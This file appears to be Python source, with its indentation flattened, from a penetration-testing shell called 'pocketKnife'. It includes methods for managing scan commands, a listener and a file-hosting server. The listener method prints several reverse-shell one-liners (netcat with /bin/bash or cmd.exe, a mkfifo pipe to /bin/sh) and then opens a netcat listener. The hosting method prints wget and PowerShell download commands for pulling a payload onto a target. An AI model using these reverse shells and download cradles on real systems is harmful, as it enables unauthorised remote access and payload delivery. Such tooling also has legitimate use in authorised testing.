def set_arg(self, args):
"""
This method is used to set a global argument.
@param args = string in the form 'argument=value'
"""
self.arg_dict[args.split('=')[0]] = args.split('=')[1]
ColorPrint.print_pass("{} set to {}".format(args.split('=')[0], args.split('=')[1]))
def unset_arg(self, arg):
"""
This will unset a global variable if it exists
@param arg = a single word
"""
if(arg in self.arg_dict):
del(self.arg_dict[arg])
ColorPrint.print_pass("{} unset.".format(arg))
else:
ColorPrint.print_fail("{} is not set.".format(arg))
def import_scans(self, filename):
try:
with open(filename) as json_scans:
data = json.load(json_scans)
for s in data:
self.scans_dict[s['name']] = scanClass.scan.from_json(s)
self.scan_file_name = filename
ColorPrint.print_pass("Scans imported from: {}".format(self.scan_file_name))
except Exception as e:
self.scan_file_name = ""
ColorPrint.print_fail(str(e))
def do_info(self, args):
"""
Prints environment information such as working directory, logging directory, scans file location,
and global arguments. It does not accept any arguments
"""
info_string = """~~~~~~pocketKnife~~~~~~
Logging Directory: {}
Scans File: {}
Global Arguments:
""".format(self.loggingdir, self.scan_handler.scan_file_name)
info_string += self.scan_handler.get_global_args()
ColorPrint.print_pass(info_string)
def search_scans(self, terms):
for scan_name in self.scans_dict:
cmd_match = self.scans_dict[scan_name].command
scan_match = scan_name
matched = False
if(terms in self.scans_dict[scan_name].command):
cmd_match = self.scans_dict[scan_name].command.replace(terms, '\x1b[0m\x1b[1;33m' + terms + '\x1b[0m\x1b[1;32m')
cmd_match = cmd_match + '\x1b[0m'
matched = True
if(terms in scan_name):
scan_match = scan_name.replace(terms, '\x1b[0m\x1b[1;33m' + terms + '\x1b[0m\x1b[1;32m')
matched = True
if(matched):
ColorPrint.print_pass("{}: {}".format(scan_match, cmd_match))
def do_setdir(self, args):
'\x1b[1;34mchange directory where logs are saved\x1b[0m'
if (args == ''):
ColorPrint.print_pass("Logging directory: {}".format(
self.loggingdir))
return
elif (len(args.split()) != 1):
ColorPrint.print_fail(
"ERROR: Incorrect syntax. Usage: 'setdir <desired_logging_directory>'"
)
return
elif (os.path.exists(args)):
self.loggingdir = args
ColorPrint.print_pass("Logging directory changed to: {}".format(
self.loggingdir))
return
else:
ColorPrint.print_fail("ERROR: {} does not exist.".format(args))
return
def do_listen(self, args):
'\x1b[1;34mListen on a port. Usage: "listen [port]"\x1b[0m'
port = args
if (port == ''):
port = random.randint(1024, 65535)
ip_addresses = helpers.get_ip_addresses()
ColorPrint.print_pass(
"Use these commands to connect to your listener:")
for ip in ip_addresses:
ColorPrint.print_pass("***** {} *****".format(ip))
ColorPrint.print_info("nc {} {} -e /bin/bash".format(ip, port))
ColorPrint.print_info("nc -c /bin/sh {} {}".format(ip, port))
ColorPrint.print_info("/bin/sh | nc {} {}".format(ip, port))
ColorPrint.print_info(
"rm -f /tmp/p; mknod /tmp/p p && nc {} {} 0/tmp/p".format(
ip, port))
ColorPrint.print_info("nc {} {} -e cmd.exe".format(ip, port))
ColorPrint.print_info(
"rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {} {} >/tmp/f"
.format(ip, port))
helpers.execute('nc -lvnp {}'.format(port))
print()
def execute(command, output_file=''):
command_list = shlex.split(command)
logging = False
logging_fd = ''
if(output_file is not ''):
logging = True
try:
logging_fd = open(output_file, 'w+')
except Exception as e:
print(str(e))
ColorPrint.print_fail("Cannot open {} for logging. Output will not be logged.".format(output_file))
logging = False
try:
if(logging):
ColorPrint.print_pass("Logging to {}".format(output_file))
proc = subprocess.Popen(command_list, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
while True:
line = proc.stdout.readline()
if not line:
break
ColorPrint.print_pass(line.decode('UTF-8'))
if(logging):
logging_fd.write(line.decode('UTF-8'))
except KeyboardInterrupt:
print('')
ColorPrint.print_warn("Keyboard interrupt recieved.")
except FileNotFoundError as e:
ColorPrint.print_fail(str(e))
if(output_file is not ''):
try:
os.remove(output_file)
ColorPrint.print_fail("Log file removed '{}'".format(output_file))
except:
ColorPrint.print_fail("Could not remove empty logging file {}".format(output_file))
ColorPrint.print_fail("Attempted to run: {}".format(command))
def do_host(self, args):
'\x1b[1;34mHost a file using a basic webserver. Usage: "host <file>"\x1b[0m'
if (args == ''):
ColorPrint.print_fail("specify a file to host")
return
# make sure file exists
if (args[0] == '~'):
args = os.path.expanduser(args)
if (not os.path.exists(args)):
ColorPrint.print_fail("'{}' does not exist".format(args))
return
# get a random high port
port = random.randint(1024, 65535)
# make a random directory
dir = ''.join(random.choice(string.ascii_lowercase) for i in range(5))
os.mkdir(dir)
# strip the path off the file if there is one
file_to_host = ntpath.basename(args)
# copy the file to the directory
shutil.copyfile(args, dir + "/" + file_to_host)
# change the working directory
workingdir = os.getcwd()
os.chdir(dir)
# start the server
try:
server_handler = http.server.SimpleHTTPRequestHandler
httpd = http.server.HTTPServer(("", port), server_handler)
httpd.timeout = None
# print the wget and powershell commands for downloading
ip_addresses = helpers.get_ip_addresses()
# print pasteables for bash
for address in ip_addresses:
request_url = "http://{}:{}/{}".format(address, port,
file_to_host)
ColorPrint.print_pass("wget {}".format(request_url))
print("")
# print pasteables for windows
for address in ip_addresses:
request_url = "http://{}:{}/{}".format(address, port,
file_to_host)
destination = "C:\\Windows\\temp\\{}".format(file_to_host)
powershell_pasteable = 'powershell -c "' + "(new-object System.Net.WebClient).DownloadFile('{}','{}')".format(
request_url, destination) + '"'
ColorPrint.print_pass(powershell_pasteable)
httpd.serve_forever()
except KeyboardInterrupt:
print('')
ColorPrint.print_info("closing server")
except Exception:
os.chdir(workingdir)
os.remove(dir + "/" + file_to_host)
os.rmdir(dir)
ColorPrint.print_fail(
"Could not open http server on port {}".format(port))
return
os.chdir(workingdir)
os.remove(dir + "/" + file_to_host)
os.rmdir(dir)
def list_scans(self):
for scan_name in sorted(self.scans_dict):
ColorPrint.print_pass(str(self.scans_dict[scan_name]))